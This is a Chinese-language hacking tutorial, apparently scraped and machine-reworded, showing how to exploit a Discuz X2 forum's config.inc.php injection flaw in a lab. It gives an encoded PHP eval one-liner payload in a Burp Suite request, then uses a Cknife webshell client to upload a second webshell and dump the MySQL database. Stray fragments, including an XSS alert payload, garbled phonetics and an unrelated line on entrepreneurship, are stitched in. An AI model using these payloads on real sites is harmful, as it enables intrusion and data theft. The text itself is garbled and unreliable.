server_name louis.google.com; 您搜索的关键词是：<%= getParameter("keyword") %>"BackGroup",主要内容：1.1 快速建立discuz论坛1.2 运用kali下BurpSuite对discuz后台注入php木马1.3 运用Cknife“菜刀”上传webshell木马到网站1.4 运用Webshell检查mysql数据库暗码并盗取数据库1.1 快速建立discuz论坛1.1.1 进犯思路想要拿下一台主机A的权限： 1、了解一下这个服务器：端口，服务器版别，操作体系版别。 找缝隙。 2、拿到对A有必定权限的身份。 假如对方是一个WEB服务器，就运用对方网站应用程序的缝隙，上传webshell然后提权3、传上去后，得到apache用户一般权限，再提权成root1.1.2 快速构建试验环境建立一个LAMP环境。 布置带有缝隙的discuz论坛1、缝隙概述：这缝隙出现在一个DZ X系列自带的转化东西里边。 缝隙途径：utility/convert/data/config.inc.php缝隙发作的原因是：config.inc.php这个文件在黑客经过post写入时，无任何过滤检测，所以黑客能够经过post办法往config.inc.php中写木马程序。 触发缝隙进程：1、在浏览器中拜访翻开 http://192.168.1.63/utility/convert/index.php 2、运用/utility/convert/index.php进行版别转化时，会主动创立utility/convert/data/config.inc.php文件。 3、config.inc.php文件没有做过滤，黑客能够运用post办法对config.inc.php注入木马程序 utility 功效浸透思路： 2、在centos7虚拟机xuegod63上建立LAMP环境[root@xuegod63 ~]#yum-y install httpd mariadb-server mariadb php php-mysql[root@xuegod63 ~]# systemctlstart httpd [root@xuegod63 ~]# systemctlstart mariadb设置mysql数据库root用户的暗码：[root@xuegod63 ~]#mysqladmin -u root password"123456"[root@xuegod63 ~]# mysql -uroot -p123456MariaDB [(none)]> exit 3、上传到Discuz_X2_SC_UTF8.zip到linux体系/root下 [root@xuegod63 ~]#unzip Discuz_X2_SC_UTF8.zip [root@xuegod63 ~]#mv upload/* /var/www/html/[root@xuegod63 ~]#mv utility/ /var/www/html/[root@xuegod63 ~]#cd /var/www/html/[root@xuegod63 html]#chown -R apache:apache uc_server/ data/ config/ uc_client/[root@xuegod63 html]# chown apache:apacheutility/convert/data[root@xuegod63html]# iptables -F #清空防火墙 4、浏览器输入http://192.168.1.63 装置装备discuz论坛 到此discuz论坛装置完结了。 1.2 运用kali下BurpSuite对discuz后台注入php木马1.2.1 浏览器上敞开署理形式进行抓包以下操作在kali linux 上进行操作浏览器翻开设置页面咱们把设置页面拉到最下面找到Network Proxy装备咱们的署理设置 1.2.1 在kali上运用burpsuite进行抓包翻开burpsuite。 brup 打嗝 ； suite [swi:t] 套件翻开会有提示咱们的jre 咱们点击OK即可注：此窗口弹出的含义如下：Burp Suite社区版您的JRE似乎是来自Oracle公司的ll.0.3版别Burp还没有在这个渠道上进行全面测验，您可能会遇到问题。 experience [�0�1k�0�4sp�0�1�0�5ri�0�5ns] 阅历 咱们先封闭阻拦，点一下 “intercept is on”，变为： “intercept is off”，由于咱们要先拜访咱们的论坛。 点完后变为：intercept [�0�5�0�1nt�0�5�0�4sept] 阻拦 截听浏览器进行操作抓包在kali上，翻开注入缝隙的当地：http://192.168.1.63/utility/convert/然后咱们回到burpsuite敞开阻拦咱们再回到web界面点击恣意版其他开端按钮回到burpsuite检查截取到浏览器数据包：假如之前抓取到了其他数据包，需求先点击forward按钮，把之前的http恳求都放行了。 然后再拜访咱们需求拜访的链接。 右键点击空白处，挑选send to repeater 。 repeater [r�0�1�0�4pi:t�0�5(r)] 中继器然后在Repeader检查信息：下面咱们来修正这个数据包，咱们把咱们需求修正的内容运用rz指令传到kali便利咱们复制粘贴。 修正榜首行：GET /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1为：留意 POST后边没有回车 ，这儿是文本显现主动换行了。 POST /utility/convert/index.php?a=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes HTTP/1.1注：这是一个php一句话木马加密后的内容。 腾飞翻译后的内容为：&newconfig[aaa%0a%0deval("$_POST[c];");//]=aaaa&submit=yesPOST /utility/convert/index.php?a=config&source=d7.2_x2.0&newconfig[aaaeval("$_POST[c];"););扩展eval()函数：eval()函数中的eval是evaluate的简称，这个函数的效果便是把一段字符串当作PHP句子来履行，一般状况下不主张运用简单被黑客运用。 　evaluate [�0�1�0�4v�0�3ljue�0�1t] 点评eval("echohello world;"); 等同于下边的代码：　echo"hello world"; 在浏览器中都输出：hello world 修正完结后发送数据包检查履行成果：登录xuegod63上，检查刚经过该缝隙注入的文件：[root@xuegod63 html]# cat/var/www/html/utility/convert/data/config.inc.php 注：/var/www/html/utility/convert/data/config.inc.php这个文件本来的网站上没有的能够看到和咱们修正提交的参数相似。 并且多了许多^M符号。 扩展：^M符号^M字符的来历和效果：在DOS/Windows里，文本文件的换行符为rn，而在linux体系里则为n，所以DOS/Windows里修正过的文本文件到了linux里，每一行都多了个^M。 所以^M仅仅一个换行符号，没有实践的用途，咱们能够将它保存，也能够将它删去%0a%0d等于rn^M=r换行符 只不过是windows里边的换行符算了 1.3 运用Cknife“菜刀”上传webshell木马到网站1.3.1 在xuegod63上装备java环境建立java环境[root@xuegod63~]#yum install -y java 然后检查java版别[root@xuegod63~]# java -versionopenjdk version"1.8.0_201"OpenJDK RuntimeEnvironment (build 1.8.0_201-b09)OpenJDK 64-BitServer VM (build 25.201-b09, mixed mode) 咱们在centos上面运用rz指令上传java版其他菜刀和咱们后边需求的webshell2.php[root@xuegod63~]# rz按住ctrl +鼠标左键能够多选，咱们挑选Cknife.jar和webshell2.php装置完结java今后咱们再来发动菜刀程序，需求在图形界面履行此指令[root@xuegod63~]#java -jar Cknife.jar排错：假如翻开程序后，看到是乱码的，咱们替换一下皮肤即可处理乱码问题1.3.2 运用菜刀衔接discuz论坛上面的php后门程序右键点击增加 途径：http://192.168.1.63/utility/convert/data/config.inc.php 暗码：c 双击点开咱们增加的地址现已能够进入网站目录1.3.3 上传功用更强壮的木马文件webshell2.php 注：这儿需求上传到apache用户有写权限的目录中，由于装置进程中discuz需求管理员修正部分权限为apache用户，所以必定有能够上传文件的目录，咱们能够直接上传到data目录下。 1.3.4 恣意机器拜访咱们的webshell2.php木马文件 浏览器输入http://192.168.1.63/utility/convert/data/webshell2.php 输入暗码：xuegod成功进入webshell1.4 运用Webshell检查mysql数据库暗码并盗取数据库1.4.1 剖析装备文件获取数据库暗码获取mysql暗码： 进到 /var/www/html/config/获取到root用户和暗码1.4.2 导出数据库文件选中自己想下载的软件包，导出数据库保存好这个地址:/var/www/html/utility/convert/data/192.168.1.63_MySQL.sql1.4.3 下载数据库到本地 也能够运用菜刀下载，回到菜刀需求点击右键更新缓存。 到这儿就完结了。 假如侵略的体系版别较低，咱们咱们就能够运用apache用户进行提权操作。 到时咱们便是root了 总结：1 快速建立discuz论坛2 运用kali linux对discuz后台注入恶意代码3 运用“菜刀”上传webshell木马4 快速剖析定位discuz装备文件并拿下数据库来学神学IT 提前成为技能大牛var x ="";alert(/xss/);//"; //赤色部分是用户输入的字符

创业，从办法上来看，创业项目分为实业创业和 *** 创业。